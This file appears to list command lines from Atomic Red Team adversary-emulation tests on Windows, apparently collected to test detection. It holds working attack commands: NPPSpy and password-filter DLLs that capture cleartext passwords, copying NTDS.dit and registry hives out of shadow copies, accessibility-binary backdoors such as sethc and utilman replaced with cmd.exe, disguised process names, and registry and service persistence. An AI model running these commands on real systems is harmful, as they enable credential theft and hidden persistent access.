"powershell.exe" & {Copy-Item \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\NPPSPY.dll\"" -Destination \""C:\Windows\System32\"" $path = Get-ItemProperty -Path \""HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\"" -Name PROVIDERORDER $UpdatedValue = $Path.PROVIDERORDER + \"",NPPSpy\"" Set-ItemProperty -Path $Path.PSPath -Name \""PROVIDERORDER\"" -Value $UpdatedValue $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name \""Class\"" -Value 2 -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name \""Name\"" -Value NPPSpy -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name \""ProviderPath\"" -PropertyType ExpandString -Value \""%%SystemRoot%%\System32\NPPSPY.dll\"" -ErrorAction Ignore echo \""[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt\""}
"cmd.exe" /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE & reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE
"powershell.exe" & {copy-item \""$env:windir\System32\cmd.exe\"" -destination \""$env:allusersprofile\cmd.exe\"" start-process \""$env:allusersprofile\cmd.exe\"" sleep -s 5 stop-process -name \""cmd\"" | out-null}
"cmd.exe" /c copy %%SystemRoot%%\System32\cmd.exe %%SystemRoot%%\Temp\lsass.exe & %%SystemRoot%%\Temp\lsass.exe /B
"cmd.exe" /c copy %%SystemRoot%%\System32\cscript.exe %%APPDATA%%\notepad.exe /Y & cmd.exe /c %%APPDATA%%\notepad.exe /B
"cmd.exe" /c copy %%SystemRoot%%\System32\wscript.exe %%APPDATA%%\svchost.exe /Y & cmd.exe /c %%APPDATA%%\svchost.exe "C:\AtomicRedTeam\atomics\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
"cmd.exe" /c copy %%windir%%\System32\windowspowershell\v1.0\powershell.exe %%APPDATA%%\taskhostw.exe /Y & cmd.exe /K %%APPDATA%%\taskhostw.exe
"cmd.exe" /c copy C:\Windows\System32\cmd.exe C:\lsm.exe & C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
"powershell.exe" & {# Copy and rename cmd.exe to VEDetector.exe Copy-Item -Path \""$env:SystemRoot\System32\cmd.exe\"" -Destination \""$env:TEMP\VEDetector.exe\"" -Force # Create registry run key for persistence New-ItemProperty -Path \""HKLM:\Software\Microsoft\Windows\CurrentVersion\Run\"" -Name \""VEDetector\"" -Value \""$env:TEMP\VEDetector.exe\"" -PropertyType String -Force # Start the renamed process Start-Process -FilePath \""$env:TEMP\VEDetector.exe\"" Start-Sleep -Seconds 5}
"cmd.exe" /c copy "C:\Windows\System32\calc.exe" %%temp%%\T1036.007_masquerading.docx.exe /Y & copy "C:\Windows\System32\calc.exe" %%temp%%\T1036.007_masquerading.pdf.exe /Y & copy "C:\Windows\System32\calc.exe" %%temp%%\T1036.007_masquerading.ps1.exe /Y & copy "C:\AtomicRedTeam\atomics\T1036.007\src\T1036.007_masquerading.vbs" %%temp%%\T1036.007_masquerading.xls.vbs /Y & copy "C:\AtomicRedTeam\atomics\T1036.007\src\T1036.007_masquerading.vbs" %%temp%%\T1036.007_masquerading.xlsx.vbs /Y & copy "C:\AtomicRedTeam\atomics\T1036.007\src\T1036.007_masquerading.vbs" %%temp%%\T1036.007_masquerading.png.vbs /Y & copy "C:\AtomicRedTeam\atomics\T1036.007\src\T1036.007_masquerading.ps1" %%temp%%\T1036.007_masquerading.doc.ps1 /Y & copy "C:\AtomicRedTeam\atomics\T1036.007\src\T1036.007_masquerading.ps1" %%temp%%\T1036.007_masquerading.pdf.ps1 /Y & copy "C:\AtomicRedTeam\atomics\T1036.007\src\T1036.007_masquerading.ps1" %%temp%%\T1036.007_masquerading.rtf.ps1 /Y & %%temp%%\T1036.007_masquerading.docx.exe & %%temp%%\T1036.007_masquerading.pdf.exe & %%temp%%\T1036.007_masquerading.ps1.exe & %%temp%%\T1036.007_masquerading.xls.vbs & %%temp%%\T1036.007_masquerading.xlsx.vbs & %%temp%%\T1036.007_masquerading.png.vbs & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %%temp%%\T1036.007_masquerading.doc.ps1 & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %%temp%%\T1036.007_masquerading.pdf.ps1 & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %%temp%%\T1036.007_masquerading.rtf.ps1
"cmd.exe" /c copy C:\Windows\System32\cmd.exe C:\svchost.exe & C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
"cmd.exe" /c copy %%windir%%\system32\certutil.exe %%temp%%\tcm.tmp & %%temp%%\tcm.tmp -encode C:\Windows\System32\calc.exe %%temp%%\T1140_calc2.txt & %%temp%%\tcm.tmp -decode %%temp%%\T1140_calc2.txt %%temp%%\T1140_calc2_decoded.exe
"cmd.exe" /c copy c:\windows\system32\ie4uinit.exe %%TEMP%%\ie4uinit.exe & copy "C:\AtomicRedTeam\atomics\T1218\src\ieuinit.inf" %%TEMP%%\ieuinit.inf & %%TEMP%%\ie4uinit.exe -BaseSettings
"powershell.exe" & {if (-not (Test-Path C:\test)) { New-Item -Path C:\test -ItemType Directory } else { Write-Host \""Directory C:\test already exists.\"" } Copy-Item -Path \""C:\windows\system32\customshellhost.exe\"" -Destination \""C:\test\customshellhost.exe\"" -Force Copy-Item -Path \""C:\windows\system32\calc.exe\"" -Destination \""C:\test\explorer.exe\"" -Force C:\test\customshellhost.exe}
"cmd.exe" /c copy %%windir%%\System32\calc.exe not_an_scr.scr & rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
"powershell.exe" & {$termsrvDll = \""C:\Windows\System32\termsrv.dll\"" $ACL = Get-Acl $termsrvDll $permission = \""Administrators\"",\""FullControl\"",\""Allow\"" $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission $ACL.SetAccessRule($accessRule) Set-Acl -Path $termsrvDll -AclObject $ACL Copy-Item -Path \""C:\Windows\System32\termsrv.dll\"" -Destination \""C:\Windows\System32\termsrv_backup.dll\"" -ErrorAction Ignore Add-Content -Path \""C:\Windows\System32\termsrv.dll\"" -Value \""`n\"" -NoNewline -ErrorAction Ignore Move-Item -Path \""C:\Windows\System32\termsrv_backup.dll\"" -Destination \""C:\Windows\System32\termsrv.dll\"" -Force -ErrorAction Ignore}
"powershell.exe" & {$termsrvDll = \""C:\Windows\System32\termsrv.dll\"" $ACL = Get-Acl $termsrvDll $permission = \""Administrators\"",\""FullControl\"",\""Allow\"" $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission $ACL.SetAccessRule($accessRule) Set-Acl -Path $termsrvDll -AclObject $ACL Copy-Item -Path $termsrvDll -Destination \""$HOME\AtomicTest.dll\"" $newServiceDll = \""$HOME\AtomicTest.dll\"" $registryPath = \""HKLM:\System\CurrentControlSet\services\TermService\Parameters\"" # Check if the registry key exists if (Test-Path -Path $registryPath) { # Modify the ServiceDll value in the registry Set-ItemProperty -Path $registryPath -Name \""ServiceDll\"" -Value $newServiceDll Write-Host \""ServiceDll value in the registry has been updated to: $newServiceDll\"" } else { Write-Host \""Registry key not found. Make sure the 'TermService\Parameters' key exists.\"" }}
"cmd.exe" /c copy "C:\AtomicRedTeam\atomics\T1543.003\bin\w64time.dll" %%systemroot%%\system32\ & sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto & sc config W64Time DisplayName= "Windows 64 Time" & sc description W64Time "Maintain date and time synch on all clients and services in the network" & reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f & reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%%systemroot%%\system32\w64time.dll" /f & sc start W64Time
"powershell.exe" & {Copy-Item -Path C:\AtomicRedTeam\atomics\T1546\src\ErrorHandler.cmd -Destination C:\Windows\Setup\Scripts\ErrorHandler.cmd C:\windows\System32\oobe\Setup}
"cmd.exe" /c reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %%userprofile%%\backup.reg & copy C:\Windows\System32\cmd.exe "%%SystemRoot%%\System32\evilscreensaver.scr" & reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f & reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f & reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f & reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%%SystemRoot%%\System32\evilscreensaver.scr" /f & if 0 NEQ 0 shutdown /r /t 0
"cmd.exe" /c IF NOT EXIST %%windir%%\System32\osk.exe.bak (copy %%windir%%\System32\osk.exe %%windir%%\System32\osk.exe.bak) ELSE ( pushd ) & takeown /F %%windir%%\System32\osk.exe /A & icacls %%windir%%\System32\osk.exe /grant Administrators:F /t & del %%windir%%\System32\osk.exe & mklink %%windir%%\System32\osk.exe %%windir%%\System32\cmd.exe
"cmd.exe" /c IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd ) & takeown /F C:\Windows\System32\AtBroker.exe /A & icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t & copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
"cmd.exe" /c IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd ) & takeown /F C:\Windows\System32\DisplaySwitch.exe /A & icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t & copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
"cmd.exe" /c IF NOT EXIST C:\Windows\System32\Magnify_backup.exe (copy C:\Windows\System32\Magnify.exe C:\Windows\System32\Magnify_backup.exe) ELSE ( pushd ) & takeown /F C:\Windows\System32\Magnify.exe /A & icacls C:\Windows\System32\Magnify.exe /grant Administrators:F /t & copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\Magnify.exe
"cmd.exe" /c IF NOT EXIST C:\Windows\System32\Narrator_backup.exe (copy C:\Windows\System32\Narrator.exe C:\Windows\System32\Narrator_backup.exe) ELSE ( pushd ) & takeown /F C:\Windows\System32\Narrator.exe /A & icacls C:\Windows\System32\Narrator.exe /grant Administrators:F /t & copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\Narrator.exe
"cmd.exe" /c IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd ) & takeown /F C:\Windows\System32\sethc.exe /A & icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t & copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
"cmd.exe" /c IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd ) & takeown /F C:\Windows\System32\utilman.exe /A & icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t & copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
"powershell.exe" & {New-Item -ItemType Directory -path \""$env:TMP\atomictest\\"" Copy-Item -path \""C:\Windows\System32\calc.exe\"" -destination \""$env:TMP\atomictest\\"" Set-ItemProperty -Path  \""HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\"" -Name \""Startup\"" -Value \""$env:TMP\atomictest\\""}
"powershell.exe" & {New-Item -ItemType Directory -path \""$env:TMP\atomictest\\"" Copy-Item -path \""C:\Windows\System32\calc.exe\"" -destination \""$env:TMP\atomictest\\"" Set-ItemProperty -Path  \""HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\"" -Name \""Common Startup\"" -Value \""$env:TMP\atomictest\\""}
"powershell.exe" & {Copy-Item \""C:\AtomicRedTeam\atomics\T1547.002\bin\package.dll\"" C:\Windows\System32\ reg add \""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\"" /v \""Authentication Packages\"" /t REG_MULTI_SZ /d \""msv1_0\0package.dll\"" /f}
"cmd.exe" /c mkdir "\\?\C:\Windows \System32\" & copy "C:\Windows\System32\cmd.exe" "\\?\C:\Windows \System32\mmc.exe" & mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
"powershell.exe" & {reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ \""C:\AtomicRedTeam\atomics\T1556.002\lsa_backup.reg\"" $passwordFilterName = (Copy-Item \""C:\AtomicRedTeam\atomics\T1556.002\bin\AtomicRedTeamPWFilter.dll\"" -Destination \""C:\Windows\System32\"" -PassThru).basename $lsaKey = Get-Item \""HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\\"" $AuthenticationPackagesValues = $lsaKey.GetValue(\""Authentication Packages\"") $AuthenticationPackagesValues += $passwordFilterName Set-ItemProperty \""HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\\"" \""Authentication Packages\"" $AuthenticationPackagesValues}
"powershell.exe" & {reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ \""C:\AtomicRedTeam\atomics\T1556.002\lsa_backup.reg\"" $passwordFilterName = (Copy-Item \""C:\AtomicRedTeam\atomics\T1556.002\bin\AtomicRedTeamPWFilter.dll\"" -Destination \""C:\Windows\System32\"" -PassThru).basename $lsaKey = Get-Item \""HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\\"" $notificationPackagesValues = $lsaKey.GetValue(\""Notification Packages\"") $notificationPackagesValues += $passwordFilterName Set-ItemProperty \""HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\\"" \""Notification Packages\"" $notificationPackagesValues}
"cmd.exe" /c copy %%windir%%\System32\amsi.dll %%APPDATA%%\amsi.dll & ren %%APPDATA%%\amsi.dll ualapi.dll & copy %%APPDATA%%\ualapi.dll %%windir%%\System32\ualapi.dll & sc config Spooler start=auto
"cmd.exe" /c copy %%windir%%\System32\amsi.dll %%APPDATA%%\amsi.dll & ren %%APPDATA%%\amsi.dll WinAppXRT.dll & copy %%APPDATA%%\WinAppXRT.dll %%windir%%\System32\WinAppXRT.dll & reg add "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /t REG_EXPAND_SZ /d "1" /f
"cmd.exe" /c copy %%windir%%\System32\windowspowershell\v1.0\powershell.exe %%APPDATA%%\updater.exe & copy %%windir%%\System32\amsi.dll %%APPDATA%%\amsi.dll & %%APPDATA%%\updater.exe -Command exit
